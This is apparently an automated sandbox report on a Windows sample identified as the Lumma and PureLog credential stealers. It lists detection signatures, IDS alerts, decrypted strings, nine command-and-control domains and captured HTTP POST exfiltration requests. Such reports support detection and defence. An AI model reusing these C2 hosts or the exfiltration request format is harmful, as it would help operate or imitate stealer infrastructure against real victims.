Edit tour

Windows Analysis Report
Script.exe

Overview

General Information

Sample name:	Script.exe
Analysis ID:	1584528
MD5:	9692fcb7996881ff1489818817d4b300
SHA1:	17c9a0067ad325da87a096e62715848b8fc4ea34
SHA256:	7931b9a8460e753cf1f42b6dc5dd0b32e40a17d19dd94b2fcbba55817a9a77b6
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

Script.exe (PID: 5060 cmdline: "C:\Users\user\Desktop\Script.exe" MD5: 9692FCB7996881FF1489818817D4B300)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Script.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\Script.exe" MD5: 9692FCB7996881FF1489818817D4B300)

WerFault.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 140 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "fancywaxxers.shop", "framekgirus.shop"], "Build id": "yau6Na--6331801298"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Script.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2001576225.0000000000482000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Script.exe PID: 1480	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Script.exe PID: 1480	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.Script.exe.480000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Script.exe.3979550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Script.exe.3979550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:57.145055+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:58.185544+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:59.312799+0100	2028371	3	Unknown Traffic	192.168.2.5	49719	104.21.80.1	443	TCP
2025-01-05T19:09:00.376766+0100	2028371	3	Unknown Traffic	192.168.2.5	49720	104.21.80.1	443	TCP
2025-01-05T19:09:01.440099+0100	2028371	3	Unknown Traffic	192.168.2.5	49721	104.21.80.1	443	TCP
2025-01-05T19:09:03.629493+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.80.1	443	TCP
2025-01-05T19:09:05.014898+0100	2028371	3	Unknown Traffic	192.168.2.5	49723	104.21.80.1	443	TCP
2025-01-05T19:09:07.124495+0100	2028371	3	Unknown Traffic	192.168.2.5	49724	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:57.696243+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:58.670578+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:09:07.853831+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49724	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:57.696243+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49715	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:58.670578+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49717	104.21.80.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:57.145055+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:58.185544+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:59.312799+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49719	104.21.80.1	443	TCP
2025-01-05T19:09:00.376766+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49720	104.21.80.1	443	TCP
2025-01-05T19:09:01.440099+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49721	104.21.80.1	443	TCP
2025-01-05T19:09:03.629493+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49722	104.21.80.1	443	TCP
2025-01-05T19:09:05.014898+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49723	104.21.80.1	443	TCP
2025-01-05T19:09:07.124495+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49724	104.21.80.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:08:56.657541+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.5	50187	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:09:04.109019+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49722	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/t	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/m	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiT	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiY	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.Script.exe.3979550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "fancywaxxers.shop", "framekgirus.shop"], "Build id": "yau6Na--6331801298"}

Multi AV Scanner detection for submitted file

Source: Script.exe	ReversingLabs: Detection: 44%
Source: Script.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 91.9% probability

Machine Learning detection for sample

Source: Script.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yau6Na--6331801298

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_004156D0 CryptUnprotectData,

2_2_004156D0

Source: Script.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49724 version: TLS 1.2

Source: Script.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: Script.exe, WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WER576.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov edx, ecx	2_2_0043180D
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 0E4A4AE9h	2_2_0040E9F8
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-14h]	2_2_00430995
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_00442B70
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	2_2_0040C3E0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ecx, eax	2_2_0043BD30
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000BBh]	2_2_0040CECB
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000298h]	2_2_004156D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000001DFh]	2_2_004156D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-4ADCAC34h]	2_2_0040A843
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00423060
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov dword ptr [ebp-28h], eax	2_2_0042C01F
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+edx+4F334F6Fh]	2_2_0042C01F
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-68B18956h]	2_2_0040B0F0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	2_2_0043C880
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2D14B172h]	2_2_0042F973
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then push eax	2_2_0044091F
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041FA00
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	2_2_0042B200
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	2_2_00402220
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [esi], dl	2_2_0042F230
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then push ebx	2_2_0043CAD0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp esi, edx	2_2_0043CAD0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 0E4A4AE9h	2_2_0040EAFB
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov edi, eax	2_2_00409320
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ecx, eax	2_2_00409320
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0041B320
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042E3E0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_00418BF1
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h]	2_2_00418BF1
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00414BF0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00414BF0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h	2_2_00414BF0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ebp, dword ptr [esp+04h]	2_2_00414BF0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then jmp ecx	2_2_0040EB9A
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00419C50
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ecx, eax	2_2_0041ACF9
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00439480
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0042FC92
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 13884179h	2_2_0043F540
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ebx, edx	2_2_00429550
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0042F55A
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp ah, 0000002Eh	2_2_00429570
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [edx], cl	2_2_00429570
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-28C59510h]	2_2_0041C500
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004195CF
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h]	2_2_004195CF
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0042F59A
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then jmp eax	2_2_0040ADB0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [esi], ax	2_2_0041CDB0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov dword ptr [edi], F073F2F5h	2_2_0040B651
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov dword ptr [edi], F073F2F5h	2_2_0040B651
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	2_2_0042B612
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042CE20
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+01h]	2_2_0041FE30
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov dword ptr [esp], eax	2_2_0041D6C0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then test esi, esi	2_2_0043CEC0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov ecx, eax	2_2_00441E80
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [edi+ecx-53h]	2_2_0040B6AD
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov eax, ecx	2_2_0041BEB1
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0041BEB1
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00428740
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0041870B
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-3EEFCD92h]	2_2_0043FF10
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_0043F710
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov esi, dword ptr [0044AB30h]	2_2_00430FD8
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00407790
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_00407790
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	2_2_0041F790

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:50187 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49719 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49721 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49720 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49715 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49723 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49724 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49722 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49717 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49715 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49717 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49722 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: framekgirus.shop

Source: Joe Sandbox View

IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E1QIVYDQY8BRGUDGLTCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D9L41FOWJUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0YTF4JD3OGNZFOCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20560Host: fancywaxxers.shop
